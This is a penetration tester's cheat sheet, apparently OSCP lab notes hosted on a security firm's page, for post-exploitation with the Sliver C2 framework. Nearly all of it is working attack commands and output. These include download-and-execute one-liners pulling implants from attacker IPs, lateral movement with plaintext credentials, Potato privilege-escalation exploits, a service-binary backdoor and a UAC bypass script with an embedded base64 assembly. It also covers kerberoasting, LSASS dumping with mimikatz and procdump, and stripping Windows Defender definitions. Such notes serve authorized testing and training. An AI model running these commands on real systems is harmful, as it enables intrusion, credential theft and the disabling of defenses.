Need a penetration test?
Contact us for a no-obligation conversation about your security needs.
Contact ushttps://seamlessintelligence.com.au/sliver_2.html
guide https://seamlessintelligence.com.au/sliver_2.html
======= https://github.com/Anon-Exploiter/sliver-cheatsheet?tab=readme-ov-file
Sometimes sliver is buggy on kali, use https://github.com/BishopFox/sliver/releases instead.
$ sliver-server
...
[server] sliver > generate --mtls 192.168.45.249,10.10.207.147 -j 3 -e -l -Z s -N agent
[server] sliver > generate --mtls 192.168.45.249,10.10.207.147 -j 3 -e -l -Z s -o linux -N agent.elf
[server] sliver > mtls
[server] sliver > armory install all
[server] sliver > sessions
└─$ python3 -m http.server 80 -d .
powershell
powershell.exe -Command "Invoke-WebRequest -OutFile c:\temp\windows\agent.exe http://192.168.45.249/agent.exe ; .\agent.exe"
"iwr -uri http://192.168.45.212/agent.exe -Outfile agent.exe ; c:\temp\windows\agent.exe"
cmd
certutil -urlcache -split -f "http://192.168.45.249/agent.exe" agent.exe
curl.exe -o c:\windows\temp\agent1.exe http://192.168.49.100:81/agent1.exe
bitsadmin /transfer myDownloadJob /download /priority normal http://192.168.45.249/agent.exe c:\users\temp\
agent.exe
Expand-Archive -Force C:\path\to\archive.zip C:\where\to\extract\to
└─$ nxc smb client02 -u o.foller -p EarlyMorningFootball777 -x 'powershell.exe -Command "Invoke-WebRequest -OutFile c:\windows\temp\agent.exe http://192.168.45.212/agent5.exe"'
SMB 192.168.174.160 445 CLIENT02 [+] Executed command via wmiexec
└─$ nxc smb client02 -u o.foller -p EarlyMorningFootball777 -x 'c:\windows\temp\agent.exe'
SMB 192.168.174.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.174.160 445 CLIENT02 [+] zeus.corp\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB 192.168.174.160 445 CLIENT02 [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method
SMB 192.168.174.160 445 CLIENT02 [+] Executed command via wmiexec
if error Execute command failed, ... has no 'Invoke' rights to execute command (shell type: cmd) try
└─$ nxc winrm gyoza -u Eric.Wallows -p EricLikesRunning800 -X "cmd /c agent212.exe"
$ nxc mssql MS02 -u sql_svc -p Dolphin1 --put-file agent.exe C:\\Windows\\Temp\\agent.exe
$ nxc mssql MS02 -u sql_svc -p Dolphin1 -X "& C:\\Windows\\Temp\\agent.exe"
wait for 20 seconds
$ sudo ligolo-proxy -selfcert
ligolo-ng » certificate_fingerprint
[server] sliver (agent) > upload /usr/share/ligolo-ng-common-binaries/ligolo-ng_agent_0.8.2_windows_amd64.exe
[server] sliver (agent) > execute -t 5 cmd /c "start /b ligolo-ng_agent_0.8.2_windows_amd64.exe -connect 192.168.45.204:11601 -accept-fingerprint B9A0DFF9A9BDB140610A962FBC48616364677E962F2755272B1F54E5DBA4E486"
ligolo-ng » session
[Agent : NT AUTHORITY\SYSTEM@MS01] » autoroute
[Agent : NT AUTHORITY\SYSTEM@MS01] » listener_add --addr 10.10.207.147:8888 --to 192.168.45.204:8888 --tcp
└─$ sudo ~/bin/masscan -e enabledmagus -p-,U:- –banners –rate=1000 $(grep 10.10 /etc/hosts|cut -d’ ’ -f1) –adapter-ip 10.10.207.147 | tee masscan.10.10 └─$ cat masscan.10.10 | ~/bin/masscan2nmap.py | sudo parallel
[server] sliver (agent) > execute -o whoami /all
[server] sliver (agent) > upload /usr/share/peass/winpeas/winPEASany.exe
[server] sliver (agent) > execute -t 600 -o -E err -O username.winpeasy winPEASany.exe
[server] sliver (agent) > download username.winpeasy
[server] sliver (agent.elf) > upload /usr/share/peass/linpeas/linpeas.sh
[server] sliver (agent.elf) > execute -t 5 -o chmod +x linpeas.sh
[server] sliver (agent.elf) > execute -t 600 -o -E err -O www.linpeas linpeas.sh
[server] sliver (agent.elf) > upload /home/pentests/lpe-linux.tgz
[server] sliver (agent.elf) > execute -t 5 -o tar xvzf lpe-linux.tgz
[server] sliver (agent.elf) > execute -t 10 -o lpe-linux/linux-exploit-suggester.sh
[server] sliver (agent) > execute -t 300 -s cmd /c "dir /s /b"
$ grep -vE '(.png|.jpg|SysWOW64|.manifest|RollupFix|WinSxS|PCHealthCheck|WindowsUpdate.|WindowsApps)' /tmp/execute_MS01_202507090809534184240560.log
$ grep -E '(proof.txt|local.txt|PSReadLine/ConsoleHost_history*|id_rsa*|.kdbx|.ini|.txt|.pdf|.xls|.xlsx|.doc|.docx|.db).$' /tmp/execute_MS01_202507090809534184240560.log | less
[server] sliver (agent1) > sharpup -t 200 -- audit
[server] sliver (agent1) > seatbelt -t 200 -- -group=all
└─$ wget 'https://raw.githubusercontent.com/itm4n/PrivescCheck/refs/heads/master/release/PrivescCheck.ps1'
[server] sliver (agent212) > upload PrivescCheck.ps1
[server] sliver (agent212) > execute -o -t 300 powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Extended checks + human-readable reports
[server] sliver (agent212) > execute -o -t 600 powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"
[server] sliver (agent1) > cat AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
[server] sliver (agent4) > ps -O -c
[server] sliver (agent) > execute -o -- setspn.exe -Q */*
[server] sliver (agent) > bof-roast MSSQL/MS02.oscp.exam
[*] Successfully executed bof-roast (coff-loader)
[*] Got output:
[+] Target SPN: MSSQL/MS02.oscp.exam
[+] Got Ticket! Convert it with apreq2hashcat.pyYIIGbwYJ...
$ tee apreq.ticket <<EOF
YIIGbwYJ...
EOF
$ wget https://raw.githubusercontent.com/cube0x0/BofRoast/refs/heads/main/BofRoast/apreq2hashcat.py
$ python3 apreq2hashcat.py apreq.ticket > hash.ticket
# look for $krb5tgs$23$; - RC4 --- if $krb5tgs$18$* AES is too hard
$ hashcat hash.ticket /usr/share/wordlists/rockyou.txt.gz -m 13100 -a 0 -r /usr/share/hashcat/rules/best64.rule
[server] sliver (agent2) > rubeus kerberoast /simple
see https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/ SeBackupPrivilege: We can dump password hashes from registry hives. We can read restricted files. SeDebugPrivilege: We can impersonate token for the lsass.exe, winlogon.exe and other processes. SeImpersonatePrivilege: We can use LocalPotato techniques. SeTakeOwnershipPrivilege: We can read restricted files by taking ownership.
injecting PrintSpoofer64.exe into a running process and launching sliver-agent Download PrintSpoofer64.exe from https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
$ donut -iPrintSpoofer64.exe -p "-i -c c:\windows\temp\agent.exe" -a 2 -o print.bin
[server] sliver (agent1) > upload print.bin
[server] sliver (agent1) > execute-shellcode -p 4596 print.bin
[*] Session 8ff76082 agent1 - 192.168.179.141:58432 (MS01) - windows/amd64 - Sun, 06 Jul 2025 13:16:45 CEST
another way
[server] sliver (agent213) > upload PrintSpoofer64.exe
[server] sliver (agent213) > execute -o -t 20 PrintSpoofer64.exe -c agent.exe
└─$ wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip └─$ 7z x JuicyPotatoNG.zip [server] sliver (agent212) > upload agent212.exe [server] sliver (agent212) > upload JuicyPotatoNG.exe [server] sliver (agent212) > execute -o -t 4 JuicyPotatoNG.exe -t * -p agent212.exe
Another method, but not stable nor fast
└─$ wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
[server] sliver (agent212) > upload GodPotato-NET4.exe
[server] sliver (agent212) > execute -o -t 50 GodPotato-NET4.exe -cmd "cmd /c whoami /all"
[server] sliver (agent212) > execute -o -t 50 GodPotato-NET4.exe -cmd "cmd /c agent212.exe"
Not tested
└─$ wget https://github.com/antonioCoco/RoguePotato/releases/download/1.0/RoguePotato.zip
└─$ 7z x RoguePotato.zip
RoguePotato.exe
???
Server not patched before January 2023, exploit CVE-2023-21746
└─$ wget https://github.com/decoder-it/LocalPotato/releases/download/v1.1/LocalPotato.zip
└─$ 7z x LocalPotato.zip
[server] sliver (agent212) > upload LocalPotato.exe
????
https://github.com/giuliano108/SeBackupPrivilege https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/
└─$ wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true -O SeBackupPrivilegeUtils.dll
└─$ wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true -O SeBackupPrivilegeCmdLets.dll
[server] sliver (agent5) > upload SeBackupPrivilegeUtils.dll
[server] sliver (agent5) > upload SeBackupPrivilegeCmdLets.dll
[server] sliver (agent5) > shell
PS C:\Users\d.chambers\appdata> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\d.chambers\appdata> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\d.chambers\appdata> Get-SeBackupPrivilege
PS C:\Users\d.chambers\appdata> copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\proof.txt C:\Users\d.chambers\appdata\proof.txt -overwrite
[server] sliver (agent) > runas -p agent.exe -u "zachary" -P "Th3R@tC@tch3r"
[server] sliver (agent1) > sharpup -t 200 -- audit
...
=== Modifiable Service Binaries ===
Service 'GPGOrchestrator' (State: Running, StartMode: Auto) : "C:\Program Files\MilleGPG5\GPGService.exe"
=== Modifiable Services ===
Service 'GPGOrchestrator' (State: Running, StartMode: Auto)
...
[server] sliver (agent1) > execute -o sc query GPGOrchestrator
[server] sliver (agent1) > execute -o sc stop GPGOrchestrator
[server] sliver (agent1) > profiles new --mtls 192.168.45.165 -f shellcode service
[server] sliver (agent1) > backdoor --profile service "C:\Program Files\MilleGPG5\GPGService.exe"
[server] sliver (agent1) > execute -t 4 -o sc start GPGOrchestrator
inspiration from https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html
$ tee CMSTP-UAC-Bypass.ps1 <<EOF
function Bypass-UAC
{
Param(
[Parameter(Mandatory = \$true, Position = 0)]
[string]\$Command
)
if(-not ([System.Management.Automation.PSTypeName]'CMSTPBypass').Type)
{
[Reflection.Assembly]::Load([Convert]::FromBase64String("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QnlwYXNzLmRsbABDTVNUUEJ5cGFzcwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AEluZkRhdGEAU2hvd1dpbmRvdwBTZXRGb3JlZ3JvdW5kV2luZG93AEJpbmFyeVBhdGgAU2V0SW5mRmlsZQBFeGVjdXRlAFNldFdpbmRvd0FjdGl2ZQAuY3RvcgBoV25kAG5DbWRTaG93AENvbW1hbmRUb0V4ZWN1dGUAUHJvY2Vzc05hbWUAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAENNU1RQLVVBQy1CeXBhc3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAERsbEltcG9ydEF0dHJpYnV0ZQB1c2VyMzIuZGxsAFN5c3RlbS5JTwBQYXRoAEdldFJhbmRvbUZpbGVOYW1lAENoYXIAQ29udmVydABUb0NoYXIAU3RyaW5nAFNwbGl0AFN5c3RlbS5UZXh0AFN0cmluZ0J1aWxkZXIAQXBwZW5kAFJlcGxhY2UAVG9TdHJpbmcARmlsZQBXcml0ZUFsbFRleHQARXhpc3RzAENvbnNvbGUAV3JpdGVMaW5lAENvbmNhdABTeXN0ZW0uRGlhZ25vc3RpY3MAUHJvY2Vzc1N0YXJ0SW5mbwBzZXRfQXJndW1lbnRzAHNldF9Vc2VTaGVsbEV4ZWN1dGUAUHJvY2VzcwBTdGFydABJbnRQdHIAWmVybwBvcF9FcXVhbGl0eQBTeXN0ZW0uV2luZG93cy5Gb3JtcwBTZW5kS2V5cwBTZW5kV2FpdABHZXRQcm9jZXNzZXNCeU5hbWUAUmVmcmVzaABnZXRfTWFpbldpbmRvd0hhbmRsZQAuY2N0b3IAAAMuAAAfQwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAAANcAAAJLgBpAG4AZgAAKVIARQBQAEwAQQBDAEUAXwBDAE8ATQBNAEEATgBEAF8ATABJAE4ARQAAQUMAbwB1AGwAZAAgAG4AbwB0ACAAZgBpAG4AZAAgAGMAbQBzAHQAcAAuAGUAeABlACAAYgBpAG4AYQByAHkAIQAAMVAAYQB5AGwAbwBhAGQAIABmAGkAbABlACAAdwByAGkAdAB0AGUAbgAgAHQAbwAgAAAJLwBhAHUAIAAAC2MAbQBzAHQAcAAAD3sARQBOAFQARQBSAH0AAISPWwB2AGUAcgBzAGkAbwBuAF0ADQAKAFMAaQBnAG4AYQB0AHUAcgBlAD0AJABjAGgAaQBjAGEAZwBvACQADQAKAEEAZAB2AGEAbgBjAGUAZABJAE4ARgA9ADIALgA1AA0ACgANAAoAWwBEAGUAZgBhAHUAbAB0AEkAbgBzAHQAYQBsAGwAXQANAAoAQwB1AHMAdABvAG0ARABlAHMAdABpAG4AYQB0AGkAbwBuAD0AQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMADQAKAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAPQBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAA0ACgBbAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgBdAA0ACgA7ACAAQwBvAG0AbQBhAG4AZABzACAASABlAHIAZQAgAHcAaQBsAGwAIABiAGUAIAByAHUAbgAgAEIAZQBmAG8AcgBlACAAUwBlAHQAdQBwACAAQgBlAGcAaQBuAHMAIAB0AG8AIABpAG4AcwB0AGEAbABsAA0ACgBSAEUAUABMAEEAQwBFAF8AQwBPAE0ATQBBAE4ARABfAEwASQBOAEUADQAKAHQAYQBzAGsAawBpAGwAbAAgAC8ASQBNACAAYwBtAHMAdABwAC4AZQB4AGUAIAAvAEYADQAKAA0ACgBbAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAF0ADQAKADQAOQAwADAAMAAsADQAOQAwADAAMQA9AEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4ALAAgADcADQAKAA0ACgBbAEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4AXQANAAoAIgBIAEsATABNACIALAAgACIAUwBPAEYAVABXAEEAUgBF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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA0D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")) | Out-Null
}
[CMSTPBypass]::Execute(\$Command)
}
EOF
[server] sliver (agent) > upload CMSTP-UAC-Bypass.ps1
[server] sliver (agent) > upload agent.exe
[server] sliver (agent) > shell
PS C:\users\zachary> . .\CMSTP-UAC-Bypass.ps1
PS C:\users\zachary> Bypass-UAC -Command "C:\users\zachary\agent.exe"
[server] sliver (agent) > use
[server] sliver (agent) > getsystem
[server] sliver (agent) > certify find /vulnerable
certify request /ca:sv001-dc.corp1.local\\corp1-SV001-DC-CA /template:WebServerVuln /altname:jboss
$ openssl pkcs12 -in cert.cer -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
[server] sliver (agent) > upload /mnt/seamless/sliver/cert.pfx
[server] sliver (agent) > rubeus asktgt /user:jboss /certificate:C:\\Windows\\system32\\cert.pfx
[server] sliver (SOLID_BLADE) > mimikatz privilege::debug sekurlsa::logonpasswords
[server] sliver (agent) > ps -e lsa
[server] sliver (agent) > procdump -p 676
$ pypykatz lsa minidump --json /tmp/procdump_MS01_676_844155305
[server] sliver (agent1) > execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
[server] sliver (agent1) > whoami
Logon ID: OSCP\celia.almeda
[*] Current Token ID: OSCP\celia.almeda
[server] sliver (agent1) > sharp-hound-4 -- '-c all,GPOLocalGroup'
[*] sharp-hound-4 output:
2025-07-06T06:01:45.7689958-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-07-06T06:01:45.8692195-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-07-06T06:01:45.8753762-07:00|INFORMATION|Initializing SharpHound at 6:01 AM on 7/6/2025
2025-07-06T06:01:45.9684446-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for oscp.exam : DC01.oscp.exam
2025-07-06T06:01:46.1258558-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-07-06T06:01:46.2613032-07:00|INFORMATION|Beginning LDAP search for oscp.exam
2025-07-06T06:01:46.2613032-07:00|INFORMATION|Testing ldap connection to oscp.exam
2025-07-06T06:01:46.2795686-07:00|INFORMATION|Beginning LDAP search for oscp.exam Configuration NC
2025-07-06T06:02:16.9212082-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM
2025-07-06T06:02:28.4338157-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-07-06T06:02:28.4338157-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-07-06T06:02:28.6092375-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.OSCP.EXAM: SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel:CertificateMappingMethods
System.Security.SecurityException: Requested registry access is not allowed.
at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
at SharpHoundCommonLib.SHRegistryKey.GetValue(String subkey, String name)
at SharpHoundCommonLib.Helpers.GetRegistryKeyData(String target, String subkey, String subvalue, ILogger log)
The Zone of the assembly that failed was:
MyComputer
